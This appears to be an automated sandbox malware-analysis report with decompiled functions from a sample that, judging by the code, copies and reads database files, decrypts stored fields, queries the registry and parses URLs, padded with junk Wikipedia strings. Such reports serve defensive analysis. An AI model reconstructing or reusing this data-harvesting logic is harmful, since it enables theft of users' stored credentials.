				signed int _t55;
				void* _t63;

				_t63 = __esi;
				_t20 = "East Pontianak (Pontianak Timur in Indonesian) is a district (Indonesian:kecamatan) of the city of Pontianak.";
				while( *_t20 != 0) {
					_t20 =  &(_t20[1]);
					if(_t20 != 0) {
						continue;
					}
					break;
				}
				_t21 = E0040D7F2(_a4);
				_t59 = _t21;
				_t45 = 3;
				_t55 = _t21 % _t45;
				_t23 = _t21;
				if(_t55 > 0) {
					_t23 = _t23 - _t55 + _t45;
				}
				_push(_t63);
				_t46 = 6;
				_t27 = malloc((_t23 << 3) / _t46 + 1); // executed
				_t48 = _t27;
				_v8 = _t27;
				_t28 = "It lies on the north bank of the Kapuas Kecil River";
				while( *_t28 != 0) {
					_t28 =  &(_t28[1]);
					if(_t28 != 0) {
						continue;
					}
					break;
				}
				E00401723(_a4, _t48, _t59);
				_t31 = "which tributary forms the western boundary of the district";
				while( *_t31 != 0) {
					_t31 =  &(_t31[1]);
					if(_t31 != 0) {
						continue;
					}
					break;
				}
				_v12 = malloc(4);
				_t33 = "It had a population of 82,370 at the 2010 census";
				while( *_t33 != 0) {
					_t33 =  &(_t33[1]);
					if(_t33 != 0) {
						continue;
					}
					break;
				}
				E00402E85(_v8,  &_v12); // executed
				_t36 = "he latest official estimate of population (as at mid 2019) is 96,029";
				while( *_t36 != 0) {
					_t36 =  &(_t36[1]);
					if(_t36 != 0) {
						continue;
					}
					break;
				}
				_v16 =  &_v8;
				memset(_v16, 0, 4 << 0);
				_t40 = "East Pontianak";
				while( *_t40 != 0) {
					_t40 =  &(_t40[1]);
					if(_t40 != 0) {
						continue;
					}
					break;
				}
				return _v12;
			}

0x00402fd2
0x00402fd9
0x00402fe0
0x00402fe4
0x00402fe5
0x00000000
0x00000000
0x00000000
0x00402fe5
0x00402feb
0x00402ff4
0x00402ff6
0x00402ff7
0x00402ff9
0x00402ffd
0x00403001
0x00403001
0x00403003
0x0040300b
0x00403016
0x00403019
0x0040301b
0x0040301e
0x00403023
0x00403027
0x00403028
0x00000000
0x00000000
0x00000000
0x00403028
0x0040302e
0x00403033
0x00403038
0x0040303c
0x0040303d
0x00000000
0x00000000
0x00000000
0x0040303d
0x00403044
0x00403047
0x0040304d
0x00403051
0x00403052
0x00000000
0x00000000
0x00000000
0x00403052
0x0040305b
0x00403062
0x00403067
0x0040306b
0x0040306c
0x00000000
0x00000000
0x00000000
0x0040306c
0x00403071
0x0040307e
0x00403080
0x00403086
0x0040308a
0x0040308b
0x00000000
0x00000000
0x00000000
0x0040308b
0x00403092

APIs

malloc.MSVCRT ref: 00403016
malloc.MSVCRT ref: 00403041

Strings

East Pontianak (Pontianak Timur in Indonesian) is a district (Indonesian:kecamatan) of the city of Pontianak., xrefs: 00402FD9
It lies on the north bank of the Kapuas Kecil River, xrefs: 0040301E
which tributary forms the western boundary of the district, xrefs: 00403033
It had a population of 82,370 at the 2010 census, xrefs: 00403047
East Pontianak, xrefs: 00403080
he latest official estimate of population (as at mid 2019) is 96,029, xrefs: 00403062

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: malloc
String ID: East Pontianak$East Pontianak (Pontianak Timur in Indonesian) is a district (Indonesian:kecamatan) of the city of Pontianak.$It had a population of 82,370 at the 2010 census$It lies on the north bank of the Kapuas Kecil River$he latest official estimate of population (as at mid 2019) is 96,029$which tributary forms the western boundary of the district
API String ID: 2803490479-793108775
Opcode ID: 1730598310d39b6e4a322f91319da54188f97de5bdcb618b3a3ccb87cf2dc621
Instruction ID: 5bbcac80e5cdc5d3cb8071b4e35bcced5cb90f85a74098174078e56feef9a35e
Opcode Fuzzy Hash: 1730598310d39b6e4a322f91319da54188f97de5bdcb618b3a3ccb87cf2dc621
Instruction Fuzzy Hash: 44214632A051442EDB15CB6899005AE7FA8EB49381F1480BBF244FB3C8EA7C4E46D348

Uniqueness

Uniqueness Score: -1.00%

Function 00403093 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50
stringnetworkCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E00403093(char _a4, char* _a8) {
				signed int _v16;
				void* _v20;
				signed int _v44;
				void* _v48;
				signed int _v56;
				void* _v60;
				void _v64;
				void _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				char* _t30;
				signed int _t31;
				void _t33;
				void* _t34;
				void* _t40;

				_t19 = 0x3c;
				_t33 = _t19;
				_t30 =  &_v64;
				do {
					 *_t30 = 0;
					_t30 = _t30 + 1;
					_t33 = _t33 - 1;
				} while (_t33 != 0);
				_v56 = _v56 | 0xffffffff;
				_v44 = _v44 | 0xffffffff;
				_v16 = _v16 | 0xffffffff;
				_v64 = _t19;
				_t20 = malloc(0x400); // executed
				_v48 = _t20;
				_t21 = malloc(0x400); // executed
				_v60 = _t21;
				_t22 = malloc(0x400); // executed
				_v20 = _t22;
				InternetCrackUrlA(_a8,  *0x61367c( &_v64, _t34, _t40), _a8, 0);
				_t14 =  &_a4; // 0x403130
				_t31 = 0xf;
				E004016EF(memcpy( *_t14,  &_v64, _t31 << 2));
				_t18 =  &_a4; // 0x403130
				return  *_t18;
			}

0x0040309b
0x0040309c
0x0040309e
0x004030a1
0x004030a1
0x004030a4
0x004030a5
0x004030a5
0x004030a8
0x004030ac
0x004030b0
0x004030c2
0x004030c5
0x004030c8
0x004030cb
0x004030ce
0x004030d1
0x004030d9
0x004030eb
0x004030f1
0x004030f9
0x004030ff
0x00403104
0x0040310a

APIs

malloc.MSVCRT ref: 004030C5
malloc.MSVCRT ref: 004030CB
malloc.MSVCRT ref: 004030D1
lstrlen.KERNEL32(000000FF,00000000,?), ref: 004030E3
InternetCrackUrlA.WININET(000000FF,00000000), ref: 004030EB

Strings

01@, xrefs: 004030F1, 00403104

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: malloc$CrackInternetlstrlen
String ID: 01@
API String ID: 290264579-1806400160
Opcode ID: 21d649f647b578b83df1bd419befc585b754fe0d47142b94bc5473a120af4266
Instruction ID: aa0a5c3f1b5c3b4279fcba3c4315589dba2d7d2ddf576f957b68f1b5b4f95cf4
Opcode Fuzzy Hash: 21d649f647b578b83df1bd419befc585b754fe0d47142b94bc5473a120af4266
Instruction Fuzzy Hash: 20011E71D00218ABCF149FA9DC45ADEBFB8AF55330F148226F921F72E0D67456018B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040AE00 Relevance: 9.1, APIs: 6, Instructions: 112
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040AE00(char _a4) {
				void* _v8;
				int _v12;
				void* _v16;
				char _v284;
				void _v539;
				char _v540;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t30;
				void* _t92;
				void* _t93;

				_v12 = 0xff;
				_v540 = 0;
				memset( &_v539, 0, 0xfe);
				_t93 = _t92 + 0xc;
				_t30 = RegOpenKeyExA(0x80000001,  *0x61340c, 0, 0x20119,  &_v8); // executed
				if(_t30 == 0) {
					RegQueryValueExA(_v8,  *0x61303c, 0, 0,  &_v540,  &_v12);
				}
				RegCloseKey(_v8);
				_v16 =  &_v284;
				memset(_v16, 0, 0x104 << 0);
				 *0x61375c();
				 *0x61375c();
				_t95 = _t93 + 0xc - 0x50;
				_t66 =  &_a4;
				E00401581( &_a4, _t93 + 0xc - 0x50);
				E0040AC23( &_v540,  *0x6130b0,  &_v284); // executed
				E00401581( &_a4, _t93 + 0xc - 0x50);
				E0040AC23( &_v284,  *0x61338c,  *0x6130c0); // executed
				E00401581(_t66, _t95);
				E0040AC23( &_v284,  *0x6133ec,  &_v284); // executed
				E00401581(_t66, _t95);
				E0040AC23( &_v284,  *0x6130bc,  &_v540);
				E00401581(_t66, _t95);
				_push( *0x613344);
				E0040AC23();
				E00401581(_t66, _t95);
				E0040AC23( &_v284,  *0x6131d0,  &_v284);
				_v16 =  &_v284;
				memset(_v16, 0, 0x104 << 0);
				return E00401562(_t66);
			}

0x0040ae1b
0x0040ae22
0x0040ae28
0x0040ae2d
0x0040ae45
0x0040ae4d
0x0040ae65
0x0040ae65
0x0040ae6e
0x0040ae7a
0x0040ae87
0x0040ae97
0x0040aeaa
0x0040aeb0
0x0040aeb3
0x0040aeb8
0x0040aeca
0x0040aed3
0x0040aee5
0x0040aeee
0x0040af00
0x0040af09
0x0040af1b
0x0040af24
0x0040af29
0x0040af36
0x0040af3f
0x0040af51
0x0040af5f
0x0040af6c
0x0040af79

APIs

memset.MSVCRT ref: 0040AE28
RegOpenKeyExA.KERNEL32(80000001,00000000,00020119,0040CBF4,?,00000000,?), ref: 0040AE45
RegQueryValueExA.ADVAPI32(0040CBF4,00000000,00000000,?,000000FF,?,00000000,?), ref: 0040AE65
RegCloseKey.ADVAPI32(0040CBF4,?,00000000,?), ref: 0040AE6E
lstrcat.KERNEL32(?,?), ref: 0040AE97
lstrcat.KERNEL32(?), ref: 0040AEAA

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValuememset
String ID:
API String ID: 2623679115-0
Opcode ID: a303878984a70afc93f7bc47a429220e17c3b46410e20342fdbecc7faa06d63b
Instruction ID: 3d81700642a7b21333f9083da4cc38e5d61a889b32d101a86e2a31946d52c5e2
Opcode Fuzzy Hash: a303878984a70afc93f7bc47a429220e17c3b46410e20342fdbecc7faa06d63b
Instruction Fuzzy Hash: 1D41967280411CBFDF44ABA0DC869C977BDEB04318F1444A7B505F7260DE399B968B94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D022 Relevance: 9.1, APIs: 6, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 100%

			_entry_() {
				CHAR* _v16;
				char _v28;
				char _v40;
				char _v52;
				char _v64;
				char _v76;
				void* _t19;
				void* _t20;
				void* _t38;
				CHAR* _t49;
				void* _t50;
				void* _t51;
				void* _t62;
				void* _t63;
				void* _t64;

				if(_t63 != 0 && _t63 == 0) {
				}
				E004017C5(_t50);
				if(_t63 != 0 && _t63 == 0) {
				}
				E0040DE01(_t50); // executed
				E0040EA50( &_v16, _t63, 0x40fbe1);
				if(_t63 != 0 && _t63 == 0) {
				}
				E0040CE69(); // executed
				_t19 = E0040D204(_t50); // executed
				_t54 = "_";
				_t20 = E0040D236(_t50);
				E0040EAEF(E0040EB6B(E0040EB6B(E0040EB6B(E0040EB6B(E0040EB6B( &_v16, _t50,  &_v76, _t63,  *0x613470), _t50,  &_v64, _t63, "_"), _t50,  &_v52, _t63, _t20), _t50,  &_v40, _t63, _t54), _t50,  &_v28, _t63, _t19), _t50,  &_v16);
				E004016EF(_v28);
				E004016EF(_v40);
				E004016EF(_v52);
				E004016EF(_v64);
				E004016EF(_v76);
				_t49 = _v16;
				while(1) {
					_t38 = OpenEventA(0x1f0003, 0, _t49);
					_t64 = _t38;
					if(_t64 == 0) {
						break;
					}
					CloseHandle(_t38);
					Sleep(0x1770);
				}
				_t62 = CreateEventA(0, 0, 0, _t49);
				if(_t64 != 0 && _t64 == 0) {
				}
				E0040CF63();
				if(_t64 != 0 && _t64 == 0) {
				}
				E0040C7F1(_t50, _t51, _t64); // executed
				CloseHandle(_t62);
				ExitProcess(0);
			}

0x0040d02b
0x0040d02b
0x0040d030
0x0040d035
0x0040d035
0x0040d03a
0x0040d047
0x0040d04c
0x0040d04c
0x0040d051
0x0040d056
0x0040d05c
0x0040d062
0x0040d09d
0x0040d0a5
0x0040d0ad
0x0040d0b5
0x0040d0bd
0x0040d0c5
0x0040d0ca
0x0040d0e8
0x0040d0eb
0x0040d0f1
0x0040d0f3
0x00000000
0x00000000
0x0040d0d7
0x0040d0e2
0x0040d0e2
0x0040d0ff
0x0040d101
0x0040d101
0x0040d106
0x0040d10b
0x0040d10b
0x0040d110
0x0040d116
0x0040d11d

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57a3988f35104efe9f445a4583047b00f9b53ad95b6a5f840e485c4f56b4d020
Instruction ID: 9cbf0195f0d8735642b9a7953b734b901334c661e9a5749e5ba326f9822be7e0
Opcode Fuzzy Hash: 57a3988f35104efe9f445a4583047b00f9b53ad95b6a5f840e485c4f56b4d020
Instruction Fuzzy Hash: 73319431D00114ABCB11BBF6CC868EE7BB9AF44308B0445BBF405B72E2DB395D568A99

Uniqueness

Uniqueness Score: -1.00%

Function 0040501F Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 268
filestringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040501F(void* __ecx, void* __eflags, char _a4, CHAR* _a16, char _a28, intOrPtr _a40, intOrPtr _a44) {
				char _v8;
				CHAR* _v20;
				char _v24;
				char _v36;
				char _v48;
				char _v60;
				char _v72;
				char _v84;
				char _v96;
				char _v108;
				char _v120;
				char _v132;
				char _v144;
				char _v156;
				char _v168;
				char _v180;
				char _v192;
				char _v204;
				char _v216;
				char _v228;
				char _v240;
				char _v252;
				char _v264;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t86;
				void* _t97;
				void* _t114;
				void* _t117;
				void* _t120;
				void* _t122;
				void* _t126;
				void* _t130;
				void* _t218;
				void* _t219;
				void* _t228;
				void* _t280;
				void* _t281;

				_t283 = __eflags;
				_t218 = __ecx;
				E0040EA50( &_v20, __eflags, 0x40fbe1);
				E0040EAEF(E0040EB6B( &_v20, _t218,  &_v36, __eflags,  *0x6133e4), _t218,  &_v20);
				E004016EF(_v36);
				_t86 = E0040D800(0x40fbe1,  &_v60, _t283, 0x14);
				_pop(_t219);
				E0040EAEF(E0040EB29( &_v20, _t219, _t86,  &_v36, _t283), _t219,  &_v20);
				E004016EF(_v36);
				E004016EF(_v60);
				CopyFileA(_a16, _v20, 1); // executed
				E0040EA50( &_v48, _t283, 0x40fbe1);
				_t97 =  *0x6135c0(_v20,  &_v24); // executed
				if(_t97 == 0) {
					_t17 =  &_v8; // 0x40642a
					_t114 =  *0x61357c(_v24,  *0x61308c, 0xffffffff, _t17, _t97); // executed
					_t281 = _t280 + 0x14;
					if(_t114 == 0) {
						_t19 =  &_v8; // 0x40642a
						_t117 =  *0x613598( *_t19);
						_t286 = _t117 - 0x64;
						if(_t117 == 0x64) {
							do {
								E0040EA50( &_v36, _t286,  *0x6135b4(_v8, 0));
								_t120 =  *0x6135b4(_v8, 1);
								_pop(_t228);
								E0040EA50( &_v60, _t286, _t120);
								_t122 =  *0x6135a4(_v8, 2, _a40, _a44);
								_t126 = E00404DEB(_t122,  &_v204,  *0x6135ac(), _v8, 2);
								_t281 = _t281 + 0x20;
								E0040EAEF(_t126, _t228,  &_v48);
								E004016EF(_v204);
								_t130 =  *0x61367c(_v48);
								_t287 = _t130 - 1;
								if(_t130 > 1) {
									E0040EAEF(E0040EB6B(0x6139e0, _t228,  &_v180, _t287,  *0x6132c8), _t228, 0x6139e0);
									E004016EF(_v180);
									E0040EAEF(E0040EB29(0x6139e0, _t228,  &_a28,  &_v108, _t287), _t228, 0x6139e0);
									E004016EF(_v108);
									E0040EAEF(E0040EB6B(0x6139e0, _t228,  &_v228, _t287, "\n"), _t228, 0x6139e0);
									E004016EF(_v228);
									E0040EAEF(E0040EB6B(0x6139e0, _t228,  &_v132, _t287,  *0x61307c), _t228, 0x6139e0);
									E004016EF(_v132);
									E0040EAEF(E0040EB29(0x6139e0, _t228,  &_a4,  &_v72, _t287), _t228, 0x6139e0);
									E004016EF(_v72);
									E0040EAEF(E0040EB6B(0x6139e0, _t228,  &_v156, _t287, "\n"), _t228, 0x6139e0);
									E004016EF(_v156);
									E0040EAEF(E0040EB6B(0x6139e0, _t228,  &_v252, _t287,  *0x6130b4), _t228, 0x6139e0);
									E004016EF(_v252);
									E0040EAEF(E0040EB29(0x6139e0, _t228,  &_v36,  &_v84, _t287), _t228, 0x6139e0);
									E004016EF(_v84);
									E0040EAEF(E0040EB6B(0x6139e0, _t228,  &_v96, _t287, "\n"), _t228, 0x6139e0);
									E004016EF(_v96);
									E0040EAEF(E0040EB6B(0x6139e0, _t228,  &_v120, _t287,  *0x613044), _t228, 0x6139e0);
									E004016EF(_v120);
									E0040EAEF(E0040EB29(0x6139e0, _t228,  &_v60,  &_v144, _t287), _t228, 0x6139e0);
									E004016EF(_v144);
									E0040EAEF(E0040EB6B(0x6139e0, _t228,  &_v168, _t287, "\n"), _t228, 0x6139e0);
									E004016EF(_v168);
									E0040EAEF(E0040EB6B(0x6139e0, _t228,  &_v192, _t287,  *0x6131f0), _t228, 0x6139e0);
									E004016EF(_v192);
									E0040EAEF(E0040EB29(0x6139e0, _t228,  &_v48,  &_v216, _t287), _t228, 0x6139e0);
									E004016EF(_v216);
									_t237 = "\n";
									E0040EAEF(E0040EB6B(0x6139e0, _t228,  &_v240, _t287, "\n"), _t228, 0x6139e0);
									E004016EF(_v240);
									E0040EAEF(E0040EB6B(0x6139e0, _t228,  &_v264, _t287, _t237), _t228, 0x6139e0);
									E004016EF(_v264);
								}
								E004016EF(_v60);
								E004016EF(_v36);
								_push(_v8);
							} while ( *0x613598() == 0x64);
						}
					}
					_t72 =  &_v8; // 0x40642a
					 *0x61359c( *_t72);
					 *0x6135c4(_v24); // executed
				}
				E004016EF(_v48);
				DeleteFileA(_v20); // executed
				E004016EF(_v20);
				E004016EF(0);
				E004016EF(0);
				E004016EF(_a4);
				E004016EF(_a16);
				return E004016EF(_a28);
			}

0x0040501f
0x0040501f
0x00405034
0x0040504d
0x00405055
0x0040505f
0x00405066
0x00405075
0x0040507d
0x00405085
0x00405092
0x0040509c
0x004050a8
0x004050b2
0x004050b9
0x004050c8
0x004050ce
0x004050d3
0x004050d9
0x004050dc
0x004050e3
0x004050e6
0x004050f1
0x00405102
0x0040510c
0x00405113
0x00405118
0x00405128
0x00405148
0x0040514d
0x00405153
0x0040515e
0x00405166
0x0040516c
0x0040516f
0x0040518a
0x00405195
0x004051a9
0x004051b1
0x004051ca
0x004051d5
0x004051ec
0x004051f4
0x00405208
0x00405210
0x00405229
0x00405234
0x0040524e
0x00405259
0x0040526d
0x00405275
0x0040528b
0x00405293
0x004052aa
0x004052b2
0x004052c9
0x004052d4
0x004052ed
0x004052f8
0x00405312
0x0040531d
0x00405334
0x0040533f
0x00405344
0x00405359
0x00405364
0x00405379
0x00405384
0x00405384
0x0040538c
0x00405394
0x00405399
0x004053a3
0x004050f1
0x004050e6
0x004053ac
0x004053af
0x004053b9
0x004053bf
0x004053c3
0x004053cb
0x004053d4
0x004053db
0x004053e2
0x004053ea
0x004053f2
0x00405403

APIs

Part of subcall function 0040EA50: lstrcpy.KERNEL32(00000000,00000000), ref: 0040EA76

Part of subcall function 0040EB6B: lstrlen.KERNEL32(?,?,?,0040D07A,00412124,00000000,00412124,00000000,0040FBE1), ref: 0040EB7F
Part of subcall function 0040EB6B: lstrcpy.KERNEL32(00000000,?), ref: 0040EBA7
Part of subcall function 0040EB6B: lstrcat.KERNEL32(?,00000000), ref: 0040EBB2

Part of subcall function 0040EAEF: lstrcpy.KERNEL32(00000000,?), ref: 0040EB1F

Part of subcall function 0040D800: GetSystemTime.KERNEL32(?,0040FBE1,00000000,?,?,?,?,?,?,?,004031B4,00000014), ref: 0040D825

Part of subcall function 0040EB29: lstrcpy.KERNEL32(00000000,?), ref: 0040EB57
Part of subcall function 0040EB29: lstrcat.KERNEL32(?,00000000), ref: 0040EB61

CopyFileA.KERNEL32(?,?,00000001), ref: 00405092
DeleteFileA.KERNEL32(?), ref: 004053CB

Part of subcall function 00404DEB: memcmp.MSVCRT ref: 00404E09
Part of subcall function 00404DEB: memset.MSVCRT ref: 00404E3B
Part of subcall function 00404DEB: LocalAlloc.KERNEL32(00000040,-000000E1), ref: 00404E71

lstrlen.KERNEL32(?), ref: 00405166

Strings

*d@, xrefs: 004050B9, 004053AC, 004050D9, 004050BC
9a, xrefs: 004050EC

Memory Dump Source

Source File: 00000000.00000002.351171685.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.351171685.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000422000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000427000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000004E3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.00000000005B4000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000613000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.351171685.0000000000625000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_B7VbZC8QLf.jbxd

Yara matches

Similarity

API ID: lstrcpy$Filelstrcatlstrlen$AllocCopyDeleteLocalSystemTimememcmpmemset
String ID: *d@$9a
API String ID: 317260277-1801666430
Opcode ID: 899d6e36e3aca9ee3cdbef8daaf2b57f7f6414d0494557bb65547933543d4c8d
Instruction ID: c3c0e81462f81eecf894e9c51fd5dccb245d59b01cfbcfe8ef7669b3d129a8b9
Opcode Fuzzy Hash: 899d6e36e3aca9ee3cdbef8daaf2b57f7f6414d0494557bb65547933543d4c8d
Instruction Fuzzy Hash: B5A10F31A00128DBCF10FBB6DC825CD7772AF04308F1559BAF506B72A2DA39AE558F58

Uniqueness

Uniqueness Score: -1.00%

Function 0040895F Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 165
stringCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E0040895F(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, char _a12, char _a48, intOrPtr _a92, intOrPtr _a96, void* _a100, intOrPtr _a104) {
				intOrPtr _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v28;
				char _v40;
				char _v52;
				char _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t52;
				void* _t63;
				void* _t65;
				void* _t67;
				void* _t106;
				void* _t113;
				void* _t115;
				intOrPtr _t118;
				void* _t143;
				void* _t148;
				void* _t149;
				void* _t150;
				void* _t152;
				void* _t153;
				void* _t154;
				void* _t155;
				void* _t156;
				void* _t157;
				void* _t158;
				void* _t159;

				_t159 = __eflags;
				E0040EAAB(__ecx, 0x6139e0, 0x40fbe1);
				E00404A31(_t106, __edx, _t115, _t159, _a92, _a96); // executed
				_v12 = _v12 & 0x00000000;
				_pop(_t113);
				if(_a104 > 0) {
					_t118 = _a8 + 0xc;
					_v8 = _t118;
					do {
						_t8 = _t118 + 0xc; // 0x8964c483
						_t63 =  *0x613784( *_t8,  *0x613200);
						_t162 = _t63;
						if(_t63 == 0) {
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t148 = _t143 - 0xffffffffffffffc0;
							asm("movsd");
							E00401581( &_a12, _t148);
							_push(_a4);
							_t118 = _v8;
							_t149 = _t148 - 0xc;
							E0040EA82(_t118 - 0xc, _t113, _t149, _t162);
							_t150 = _t149 - 0xc;
							E0040EA82(_t118, _t113, _t150, _t162); // executed
							E00408427(_t113, _t162); // executed
							_t143 = _t150 + 0x7c;
						}
						_t14 = _t118 + 0xc; // 0x8964c483
						_t65 =  *0x613784( *_t14,  *0x613364);
						_t163 = _t65;
						if(_t65 == 0) {
							E0040EA50( &_v28, _t163, 0x40fbe1);
							_v16 = _t118 + 0xfffffff4;
							E0040EAEF(E0040EB6B(E0040EB29(E0040EB6B( &_v28, _t113,  &_v64, _t163, 0x40fbe4), _t113, _t118 + 0xfffffff4,  &_v52, _t163), _t113,  &_v40, _t163, 0x40fbe4), _t113,  &_v28);
							E004016EF(_v40);
							E004016EF(_v52);
							E004016EF(_v64);
							asm("movsd");
							asm("movsd");
							asm("movsd");
							_t152 = _t143 - 0xffffffffffffffc0;
							asm("movsd");
							E00401581( &_a12, _t152);
							_push(_a4);
							_t153 = _t152 - 0xc;
							E0040EA82( &_v28, _t113, _t153, _t163);
							_t154 = _t153 - 0xc;
							E0040EA82(_v16, _t113, _t154, _t163);
							_t155 = _t154 - 0xc;
							E0040EA82(_v8, _t113, _t155, _t163); // executed
							E004085E2(_t113, _t163); // executed
							_t143 = _t155 + 0x88;
							E004016EF(_v28);
							_v28 = _v28 & 0x00000000;
							_v20 = _v20 & 0x00000000;
							E004016EF(0);
							_t118 = _v8;
						}
						_t37 = _t118 + 0xc; // 0x8964c483
						_t67 =  *0x613784( *_t37,  *0x6134b8);
						_t165 = _t67;
						if(_t67 == 0) {
							_t156 = _t143 - 0x50;
							E00401581( &_a12, _t156);
							_t118 = _v8;
							_t157 = _t156 - 0xc;
							E0040EA82(_t118 - 0xc, _t113, _t157, _t165);
							_t158 = _t157 - 0xc;
							E0040EA82(_t118, _t113, _t158, _t165); // executed
							E004087FA(_t113, _t165); // executed
							_t143 = _t158 + 0x68;
						}
						_v12 = _v12 + 1;
						_t118 = _t118 + 0x24;
						_v8 = _t118;
						_t166 = _v12 - _a104;
					} while (_v12 < _a104);
				}
				_t52 =  *0x6139e0; // 0x41f010
				_push( *0x61367c(_t52));
				_push(_t52);
				E0040EA82( &_a48, _t113, _t143 - 0xc, _t166);
				E00401581( &_a12, _t143 - 0xffffffffffffffbc);
				_push( &_v64);
				E00403721(_t113, _t166);
				E004016EF(_v64);
				return E00401562( &_a12);
			}

0x0040895f
0x00408972
0x0040897d
0x00408982
0x0040898b
0x0040898c
0x00408995
0x00408998
0x0040899b
0x004089a1
0x004089a5
0x004089ab
0x004089ad
0x004089b7
0x004089b8
0x004089b9
0x004089ba
0x004089bd
0x004089c3
0x004089c8
0x004089cb
0x004089ce
0x004089d6
0x004089db
0x004089e2
0x004089e7
0x004089ec
0x004089ec
0x004089f5
0x004089f9
0x004089ff
0x00408a01
0x00408a0f
0x00408a24
0x00408a3f
0x00408a47
0x00408a4f
0x00408a57
0x00408a64
0x00408a65
0x00408a66
0x00408a67
0x00408a6a
0x00408a70
0x00408a75
0x00408a7b
0x00408a80
0x00408a88
0x00408a8d
0x00408a95
0x00408a9a
0x00408a9f
0x00408aa7
0x00408aad
0x00408ab2
0x00408ab6
0x00408abc
0x00408ac1
0x00408ac1
0x00408aca
0x00408ace
0x00408ad4
0x00408ad6
0x00408ad8
